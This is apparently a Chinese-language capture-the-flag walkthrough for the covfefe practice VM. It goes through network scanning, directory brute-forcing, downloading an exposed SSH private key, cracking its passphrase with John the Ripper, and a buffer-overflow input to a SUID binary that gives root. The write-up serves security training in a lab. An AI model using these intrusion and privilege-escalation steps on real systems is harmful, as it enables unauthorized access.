对于covfefe靶场,在安装的时候一定要注意网络设置,不然netdiscover可能会扫描不到!!
- 挖掘开放服务信息 对于只是给定一个对应ip地址的靶场机器,我们需要对其进行扫描,探测开放的服务,渗透其实是针对服务的漏洞探测,然后进行对应的数据包发送,获取机器的最高权限
- 探测靶场
- sudo su -
- netdiscover -r 192.168.1.1/24
- nmap -sV 192.168.1.102
- 探测靶场
- 探测大端口的信息,对于开放http服务的大端口,可采取http://ip:port/ 的形式访问
查看源代码获取对应的信息,如果没有flag信息,使用工具探测隐藏页面- 对这个服务的隐藏文件进行探测 dirb http://ip:port/
- dirb http://192.168.1.102:31337
- 查看文件 http://192.168.1.102:31337 下载文件
- 查看 http://192.168.1.102:31337/.ssh
- 下载三个文件 ['id_rsa', 'authorized_keys', 'id_rsa.pub']
- 查看文件与权限 ls -alh
- -rw-r--r-- 表示只有root读写,其他只能读
- 查看登录信息cat authorized_keys
- 登录 ssh -i id_rsa simon@192.168.1.102
- 失败需要权限
- 赋予权限 chmod 600 id_rsa
- 查看文件与权限 ls -alh
- 登录 ssh -i id_rsa simon@192.168.1.102
- 要输入密码--失败
- dirb http://192.168.1.102:31337
- 使用ssh2john 将id_rsa密钥信息转换为john可以识别的信息
- 找到ssh2john locate ssh2john
- ssh2john id_rsa > rsacrack
- python /usr/share/john/ssh2john.py id_rsa > rsacrack
- 利用字典解密isacrack信息
- zcat /usr/share/wordlists/rockyou.txt.gz|john --pipe --rules rsacrack
- 找到密码 starwars
- zcat /usr/share/wordlists/rockyou.txt.gz|john --pipe --rules rsacrack
- 分离用户名、利用ssh登录服务器
- ssh -i id_rsa 用户名@ssh 靶场机器IP地址
- ssh -i id_rsa simon@192.168.1.102
- 密码 starwars
- ssh -i id_rsa simon@192.168.1.102
- 查看路径 pwd
- 查看文件 ls
- cd /root
- ls
- cat flag.txt 被拒绝,需要提升权限
- 查看具有root权限的文件 find / -perm -4000 2>/dev/null
- 运行c文件 read_message
- cat read_message.c
- 看到里面有flag提示
- read_message
- 通过溢出代码访问到加权文件超过20个字符,进入root权限
- 输入 Simon123456789012345/bin/sh
- 查看角色信息权限 whoami
- cat flag.txt
- cat read_message.c
- ssh -i id_rsa 用户名@ssh 靶场机器IP地址
- 对这个服务的隐藏文件进行探测 dirb http://ip:port/
-------------------------------------------------------------------------------------------